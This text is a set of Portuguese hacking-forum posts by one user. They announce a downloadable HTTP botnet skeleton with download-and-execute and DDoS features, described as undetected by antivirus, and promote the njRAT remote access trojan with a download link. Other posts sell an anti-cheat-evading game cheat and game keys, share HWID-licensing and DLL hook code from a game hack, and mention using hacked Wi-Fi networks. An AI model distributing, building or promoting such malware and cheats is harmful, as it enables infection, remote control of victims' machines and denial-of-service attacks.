ThatGuyPT

Estas serverfiles foram feitas por mim para diversas comunidades. Isto poupará o trabalho de criar máquinas virtuais e fará muito mais fácil a edição e manutenção de um servidor de um pequeno proprietário. Apesar de não ir mudar nada de especial facilita a vida das pessoas e portanto acho útil. Está o tutorial no ficheiro README.txt Download: https://mega.co.nz/#!MsZBCTzA!KIYVh1hgE5zLtvm8SqooRXnZpipo_I1r5rpneldrXSs O Game é 40250.

Bem pessoal venho aqui publicar o meu Esqueleto/Proof of Concept duma HTTP Botnet com um parser super simples para analizar tudo o que é passado da API para cada um dos slaves, bastante simples, extremamente estável. Aposto que ninguém daqui vai querer saber, mas isto tem o seu valor educacional visto estar tudo comentado a explicar o que cada coisa que faz, é excelente como base para o que quiserem. Tenho ainda de agradecer a uma pessoa que sabe quem é quando ler isto por ter paciência para me aturar, nome que não vou mencionar por não saber se deve ser mencionado, mas fica o agradecimento. De momento tem 3 funções relacionadas com download: Download Download&Execute Download&Execute Silence Mode (Não mostra a consola/GUI do programa) Tem 4 funções de DDoS, não testadas devido à falta de recursos: 2 das quais de Layer 4: - UDP Connection Spammer - TCP Connection Spammer 2 outras de Layer 7, HTTP related: - Slowloris - HTTP Flood As funções relativas ao download são extremamente estáveis e estão testadas intensivamente, é uma TCP Buffered Stream que de momento apenas funciona para o HyperText Transfer Protocol. A função relativa ao File Transfer Protocol como não a fiz não a puz ainda. Todo o projeto foi feito por mim e não deverá ser partilhado em qualquer outro fórum sem o meu consentimento prévio que poderá ou não ser dado após um pedido formal. Isto não é de todo uma HTTP Botnet funcional pois faltam funções como Silent Mining, Stealers, Loggers, Rootkit, Bootkit (ou mesmo startup normal), PE Infection(opcional) e mesmo Web Panel apesar de estar 2/54 dia 09-06-2014 e ter estado FUD na data do seu desenvolvimento. O conceito para o Web Panel é ter um identificador único para cada slave e a partir daí construir uma API em PHP para retornar a string em request do que o bot deverá fazer, deverá ser tudo feito em HTML, CSS, JavaScript, PHP e a base de dados em SQL podendo ter níveis de complexidade bastante distintos. Recomendo ainda a encriptar o que é mandado para o slave, recorrendo a algum tipo de encriptação que necessite de uma chave única para cada slave, isso fica ao vosso critério. LINK: https://anonfiles.com/file/16ded7676cbeef5f8a2be176af60047f Scan: https://www.virustotal.com/en-gb/fi...163ef8a1a3c101e7631d0ae7/analysis/1402334848/ A source toda ela serve para educar, tanto que toda ela está comentada para mostrar o que faz cada coisa. E lembre-se, não posso ser responsabilizado pelos seus actos.

Boas pessoal. Ontem e hoje andei a trabalhar no meu ultimo sistema que permite proteger o vosso software desenvolvido em C++ . Este software não é o novo grito, no entanto serve muito bem para o que precisam. #pragma comment(lib, "Ws2_32.lib")#include <winsock2.h>#include <iostream>#include <string>#include <sstream>#define recvBuffSize 2000const std::string host = "multicraft.proficyhost.com", page = "hwid2.txt";int main(int argc, char* argv[]){ //HWID Check Starts Here HW_PROFILE_INFO hwid; WSADATA wsData; if (WSAStartup(MAKEWORD(2, 2), &wsData) != 0) return 1; SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == INVALID_SOCKET) { WSACleanup(); return 1; } int check, i = 0; hostent *dns; char recieve[recvBuffSize]; //Webrequest para ir buscar o conteúdo do documento .txt sockaddr_in sin; sin.sin_addr.S_un.S_addr = inet_addr(host.c_str()); sin.sin_family = AF_INET; sin.sin_port = htons(80); std::string req; memset(&req, 0, sizeof(req)); memset(&recieve, 0, sizeof(recieve)); req = "GET /" + page + " HTTP/1.1rnHOST: " + host + "rnUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)rnConnection: Closernrn"; if (sin.sin_addr.s_addr == INADDR_NONE) { dns = gethostbyname(host.c_str()); if (dns == NULL) return 1; while (dns->h_addr_list[i]) { //Loop nas resoluções do hostname sin.sin_addr.s_addr = *(unsigned int*)(dns->h_addr_list[i]); check = connect(sock, (sockaddr*)&sin, sizeof(sin)); if (check == SOCKET_ERROR) i++; else break; } } else { check = connect(sock, (sockaddr*)&sin, sizeof(sin)); if (check == SOCKET_ERROR) return 1; } check = send(sock, req.c_str(), req.size(), NULL); if (check == SOCKET_ERROR) { std::cout << WSAGetLastError(); std::cin.get(); WSACleanup(); return 1; } recv(sock, recieve, sizeof(recieve), NULL); WSACleanup(); std::string final = recieve; //conversao char* para string para usar funções especificas (erase, replace etc) int x, nume, countline = 0; char hwidlist[255][8]; int pos, lineact; int line = 0; //APAGA AS INFORMAÇÕES RELATIVAS Á WEBREQUEST (Header enorme a ignorar) for (x = 0; i < final.length(); x++) if (final.at(x) == 'r' && final.at(x + 1) == 'n' && final.at(x + 2) == 'r' && final.at(x + 3) == 'n') break; final.erase(0, x + 4); // nume = 0; int cv = 0; countline = 0; //Escrever os IDs da string recebida do servidor para um vector para mais fácil acesso while (nume < final.length()){ if (final.at(nume) != 'n' && final.at(nume) != 'r'){ hwidlist[line][cv] = final.at(nume); cv++; } if (final.at(nume) == 'n' || final.at(nume) == 'r'){ line++; countline++; cv = 0; } nume++; } // //Hard Disk ID Grabber DWORD dwSerial; std::stringstream ss; std::stringstream ss2; std::string ret; if ( !GetVolumeInformation("C:", NULL, 0, &dwSerial, NULL, NULL, NULL, 0 ) ) { ss << "Error: " << GetLastError(); } else { ss << dwSerial; int x = atoi( ss.str().c_str() ); char hex[64]; _snprintf( hex, sizeof( hex ) -1, "%x", x ); ret = hex; } char *dataa; dataa = reinterpret_cast<char *>( strdup( ret.c_str() ) ); int countright; bool continuar = true; int linh, car; //Comparar o Hard Disk ID com os IDs presentes no nosso documento .txt no servidor for(linh = 0; linh <= countline; linh++){ if(continuar == true){ // DEBUG std::cout << "Linha " << linh << std::endl; countright = 0; for (car = 0; car <= 8; car++){ if (hwidlist[linh][car] == dataa[car]){ countright++; // DEBUG std::cout << "Caracter certo na linha " << linh << " Certos ate agora:" << countright << std::endl; } } if(countright == 8){ continuar = false; // DEBUG std::cout << "Parou" << std::endl; } } } if (countright == 8){ // DEBUG std::cout << "Caracteres Certos: " << countright << std::endl; // DEBUG std::cout << "Numero de Linhas: " << countline+1 << std::endl; std::cout << "HWID Authentication Sucessful, Access Granted." << std::endl; //AQUI FICARÁ LOCALIZADO O NOSSO PROGRAMA PRINCIPAL } else{ // DEBUG std::cout << "Caracteres Certos: " << countright << std::endl; // DEBUG std::cout << "Numero de Linhas: " << countline+1 << std::endl; std::cout << "Your HWID:" << dataa << std::endl; std::cout << "HWID Unsuccessful, Access Blocked." << std::endl; // DEBUG std::cout << final << std::endl; // DEBUG std::cout << "MEU ID: " << dataa[0] << dataa[1] << dataa[2] << dataa[3] << dataa[4] << dataa[5] << dataa[6] << dataa[7] << std::endl; // DEBUG std::cout << "IDs no ficheiro:" << std::endl; // std::cout << hwidlist[0][0] << hwidlist[0][1] << hwidlist[0][2] << hwidlist[0][3] << hwidlist[0][4] << hwidlist[0][5] << hwidlist[0][6] << hwidlist[0][7] << std::endl; // std::cout << hwidlist[1][0] << hwidlist[1][1] << hwidlist[1][2] << hwidlist[1][3] << hwidlist[1][4] << hwidlist[1][5] << hwidlist[1][6] << hwidlist[1][7] << std::endl; // std::cout << hwidlist[2][0] << hwidlist[2][1] << hwidlist[2][2] << hwidlist[2][3] << hwidlist[2][4] << hwidlist[2][5] << hwidlist[2][6] << hwidlist[2][7] << std::endl; } std::cin.get(); //HWID Check ends here return 0;} Código extremamente desorganizado, eu sou horrivel com as variáveis, deixei ainda as mensagens usadas para debugging, funciona um pouco como proof of concept essas instruções comentadas. Eu implementei isto no meu hack que é uma .DLL e nesta por exemplo caso detecte que o HWID (neste caso é o Serial do Disco-Rigido) não está presente no ficheiro .txt hwid.txt do servidor pretendido simplesmente faz a função RemoveHooks(); int WINAPI RemoveHooks(){ hookedD3D9.CleanUp(); HookVTableFunction<Reset_t>(dwpVTableStart,16,(DWORD)oReset); HookVTableFunction<Present_t>(dwpVTableStart,17,(DWORD)oPresent); HookVTableFunction<Reset_t>(dwpDeviceVMT,16,(DWORD)oReset); HookVTableFunction<Present_t>(dwpDeviceVMT,17,(DWORD)oPresent); Sleep(1000); return 0;} O que esta faz é basicamente não mostrar mais o menu do hack no ecrã logo a .DLL continua injetada sem ter qualquer função. Podem usar ao vosso gosto. Exploits: Indo ao ficheiro de hosts do windows e alterando o host onde vão buscar o documento txt para um website qualquer onde tenha um ficheiro com o mesmo nome e com o HWID das pessoas é possível burlar o sistema. Como Melhorar: Não é totalmente segura esta forma de gerar o HWID, a minha recomendação é algo do género de: md5(Disk ID + CPU ID + salt);. Devido à maneira fácil de explorar a falha através do ficheiro de hosts do windows há uma maneira de arranjar. O conceito é o mesmo dum chat em c++, fazemos uma API para verificar numa base de dados MySQL, mas isto requer uma VPS/Dedicado. Consiste em ter um servidor que recebe os HWIDs dos clientes e verifica-os na base de dados MySQL, se existir retorna a duração da licença e que existe. É muito fácil dar exploit numa falha que usa um ficheiro .txt numa página web mas muito dificil emular os pacotes recebidos em retorno, pelo que é quase impossivel contornar se feito dessa maneira. Não façam ligação direta a uma base de dados porque através de reverse engineering é possivel ter acesso á base de dados e password. Recomendo a darem pack no vosso executável com Themida/Enigma Protector para maximizar a segurança. (Agradecimentos ao GunnerMBT pelas ideias) Não irei fornecer nenhuma das melhorias indicadas, eu forneço a base e trabalham-na como quiserem, algo que fosse tão seguro como o que eu falei não poderia ser publicado publicamente gratuitamente. Comentei o código para explicar melhor.

Com um Servidor de tamanho de 24KB o njRAT é-nos apresentado como o melhor RAT gratuito que por aí anda. Todas as funções que são precisas, simples e estável. Tem como dependências o .NET Framework 2.0 que pode limitar um pouco, mas a percentagem de utilizadores com .NET Framework 2.0 instalado no PC é bem acima de 90%. Download: http://ge.tt/6FrjZok1/v/0?c

Bem vim postar aqui o meu tópico, é C&P de outros fórums e despenso chorarem sobre como arruino o jogo, é intencional e não guardo remorsos.

Boas pessoal. Preciso dum cartão virtual MBNET para "confirmar a minha entidade" no PayPal.Isto acontece porque em férias em Espanha acedi a conta em 1001 hotspots públicos e nuns quantos WiFis hackeados. Acedi hoje em casa para fazer um pagamento avolumado e o PayPal automaticamente como medida de segurança limitou a conta para prevenir um possível roubo de conta e dinheiro.Não tenho um cartão de credito nem MBNET portanto preciso dum cartão com 1.5€. Pago 5€ a quem me conseguir fazer este serviço simples.Aqui está as instruções enviadas para mim: Pago 5€ a quem me conseguir fazer esta tarefa simples.

Boas pessoal. Este tópico é o meu tópico onde vendo serviços de metin2 AOS PREÇOS DE MERCADO praticados por toda a gente, porque não é por ser metin2 que fica mais barato.Serviços Disponíveis.Front-End DevelopmentBasicamente tudo o que é desenvolvido e o utilizador vê e interage. Isto é normalmente a marcação do website, o estilo, design e scripts feitas orientadas para o front-end como javascript ou algumas de PHP. No metin2 isto também inclui serviços a nível de cliente.Um freelancer front-end developer pode cobrar um valor de até 100€ à hora e continuar aceitável. Eu cobro 50€ à hora e apenas aceito pagamentos que não sirvam para limpar o rabo quando cago (ex: PaySafeCard) como PayPal, Bitcoins, Litecoins.Back-End DevelopmentBasicamente tudo o que é feito como núcleo de tudo que pode ser acedido indiretamente pelo front-end dum projeto. Com isto refiro-me a trabalhos no game, algumas scripts a nível de website, base de dados etc.Geralmente um back-end developer cobra um valor entre 40 - 250€, eu cobro 75€ à hora por trabalhos do género.Aqui têm a vossa ajuda. Have fun :dancedood:

http://datasoft.ws/cart.php?gid=129Coupon: free24coreHave fun

Antes de mais não sou um designer, não pretendo ser um designer, o projecto no estado actual está quase completo a nível de funções. Está completo a nível de funções básicas, recomeçarei tudo de novo e desenharei o site em photoshop antes de o fazer dessa vez. De qualquer modo foi investido em Protecção, segurança, tanto a nível do código em si como através do investimento numa WAF. ATENÇÃO: Apenas é compatível com Windows Vista e posteriores, Windows XP e anteriores não são compativeis. Precisam de activar o Windows Aero para isto trbalhar, normalmente vem pre-activado com o PC já. Vouches: Dou licenças para testes de 24h e.e O meu website abriu ontem e já tenho 2 produtos, recebi muito bom feedback dos 2 e pretendo continuar a adicionar mais produtos. Este cheat foi feito para ser utilizado em Competitive Matchmaking ou seja, o mais simples possível e de forma a ser o menos intrusivo possível no processo do jogo. Assim sendo não escreve nada na memória do jogo e é uma overlay - uma janela que está por cima da janela do jogo. Podia ter ido mais longe fazendo o hack em DLL e injetando no Internet explorer ou assim, mas no big deal. Preço: 6$ Por Mês *Preço pode ser alterado a qualquer altura sem aviso* https://www.proficyshop.com/ ToS 1 conta por pessoa. Partilha de conta dará bloqueio, há métodos para verificar isto portanto não arrisquem. Não dar leak do produto. Não tentarás quebrar a proteção do produto. Não irás abrir uma disputa sobre o pagamento. Tenho o direito de mudar os Termos de Serviço quando me apetecer e deixarei a data da ultima modificação no post. Ultima Modificação: 16-07-2014 VIDEOS https://www.youtube.com/watch?v=qYqEM0bFNyA Este vídeo mostra o processo todo desde o registo, à compra, ao download e ao uso do cheat, bem como o que é o cheat. FAQ - O que vou receber? - Um ficheiro .zip com o executável do hack e um ficheiro README. - É indetetável? - Sim, de momento sim, mas tenham cuidado na forma como jogam para não levarem Overwatch Ban.. - Qual é a timezone do sistema de licenciamento? - Hora da Holanda. Esta ferramenta tornará qualquer aleijado em Global Elite pr0 mlg 420 n0sc0p3r Comentários Chorões serão ignorados.

Um dos maiores vendedores de keys de ArmA 2 por aí decidiu criar um tópico por águas portuguesas para ver como corre o negócio por aqui. Preço: Paypal Autobuy -> 2.50$ Cada Paysafecard Manualmente (Skype) -> 10€ 4 Keys ou algo equivalente Website: http://proficy.tk/ Website levará rework em breve e será mudado domínio e alojamento, ainda estou a testar umas coisas e a corrigir exploits (ie SQLi, Data Tamper), de momento não deverá estar vulnerável. Estive a trabalhar algum tempo nesse website para ficar limpo e deixei o design um pouco de parte, deverei trabalhar nele em breve e adicionar novos produtos. Skype:

Por razões de segurança vou saír da comunidade. Talvez ande por aí talvez não, não me tentem procurar. Apaguem o que houver de estranho na minha conta. Cya love you kisses adoro-vos espero qe a cyber prevaleça.

Pensei que o tópico de despedida pudesse causar duvidas e voltei a esta conta por TOR uma ultima vez para esclarecer algo: Nem eu. nem o JonnyC fizemos algo de ilegal ou que nos comprometa. Eu estou a desaparecer apenas pelo simples motivo de preservar a segurança de outras pessoas. Eu não estou, não estive e não estarei em pergio.

Boas. Pensei já ter feito o meu ultimo tópico na comunidade mas enganei-me. Venho fazer a sugestão de abrir os registos. Nem o squazzy nem quem vos atrofiou irá voltar a atrofiar convosco, isso vos garanto. E pronto este é suposto finalmente ser o ultimo tópico.

AEK é a melhor arma do jogo, é easy peasy.

Vouch para o Kenny. Ele deu downgrade à minha bios e por fim deletou-a

Vê como o anti-cheat funciona e faz o oposto.

Bota Halfmann 700W que isso arrefece

A verdade é que nós não fazemos ideia do que se passa. Principalmente porque aqui muito pouca gente deve jogar Trackmania.

Boas tardes caro jogador. Daqui é o suporte oficial do Trackmania, estamos a analizar o seu probl.......... Ahhhhhhhhhhhhhhhhhh just kidding XD Vai ao suporte oficial deles, nós não te podemos ajudar.

Postem aqui tudo relacionado com esta fenomenal fonte de alimentação.

Há um protocolo que diz que deves pesquisar e não pesquisaste. Plus não foi para te atingir, foi uma dica.

Oh claro, as tuas dúvidas são tão retardadas que as pessoas pensam que estás a trollar e não te levam a sério, logo não te respondem.